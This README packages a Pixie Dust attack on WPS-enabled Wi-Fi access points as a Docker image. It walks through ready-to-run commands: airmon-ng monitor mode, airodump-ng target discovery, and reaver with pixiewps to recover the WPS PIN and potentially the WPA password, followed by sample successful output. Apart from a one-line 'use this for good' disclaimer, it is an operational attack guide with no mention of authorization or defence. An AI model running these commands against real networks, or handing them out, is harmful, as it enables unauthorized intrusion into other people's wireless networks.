WiFi Hacking with Pixie Dust Attack (WPS)

Use this for good and not evil. It will only work on wireless access points that are configured with Wi-Fi Protected Setup.

Build and Run

This image should come out to be around 30MB.

docker build -t stevenaldinger/wifi-hack-pixie-dust-attack:latest .

Run privileged and with --net=host so your host machines wireless interfaces are available inside the container.

docker run --rm -it --privileged --net=host stevenaldinger/wifi-hack-pixie-dust-attack:latest sh

General Process

First find your wireless interface name and set it to monitoring mode with airmon-ng. Then start airodump-ng and find the BSSID of the access point you want to attack.

# get wireless interface
wireless_interface="$(airmon-ng | grep phy0 | awk '{print $2}')"

# start airmon-ng on the wireless interface
# this changes the interface name
airmon-ng start "$wireless_interface"

# get new wireless interface name
wireless_interface="$(airmon-ng | grep phy0 | awk '{print $2}')"

# start airodump-ng on the wireless interface
# need to get BSSID from this for the AP you're trying to crack (or all of them and iterate)
airodump-ng "$wireless_interface"

At this point you'll see something similar to this in your terminal:

> BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
>
> A3:2C:9B:C2:23:53  -78       32        1    0   1  130  WPA2 CCMP   PSK  NETGEARxxx      
> DB:DF:03:AD:9B:05  -85       15        0    0  10  270  WPA2 CCMP   PSK  NETGEARxxx_2GEXT

Find the BSSID that identifies the access point you want to attack, and run:

# example: bssid_to_attack="DB:DF:03:AD:9B:05"
bssid_to_attack="<YOUR BSSID GOES HERE>"

# run reaver to brute force the WPS pin (and potentially WPA password if mode = 3)
reaver -i "$wireless_interface" -b $bssid_to_attack -vv -K 1 -N

Output

If successful, the output will look something like this:

# reaver -i "$wireless_interface" -b $bssid_to_attack -vv -K 1 -N

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from DB:DF:03:AD:9B:05
[+] Switching wlp1s0mon to channel 1
...
[+] Switching wlp1s0mon to channel 8
[+] Switching wlp1s0mon to channel 10
[+] Received beacon from DB:DF:03:AD:9B:05
[+] Vendor: RalinkTe
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with DB:DF:03:AD:9B:05 (ESSID: NETGEARxx_2GEXT)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
...
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
...
[+] Received M1 message
executing pixiewps -e eab77...af92 -s 22ac...7372 -z a3f7...2a6d -a 1c06...ca1a -n 7564...de1a -r 349c...edd1

 Pixiewps 1.4

 [?] Mode:     1 (RT/MT/CL)
 [*] Seed N1:  0x7936402a
 [*] Seed ES1: 0x00000000
 [*] Seed ES2: 0x00000000
 [*] PSK1:     d0f2318df9619dd86ee7371d27dcgf16
 [*] PSK2:     834de146498345e034cf233eab6786ab
 [*] ES1:      00000000000000000000000000000000
 [*] ES2:      00000000000000000000000000000000
 [+] WPS pin:  43452301

 [*] Time taken: 0 s 43 ms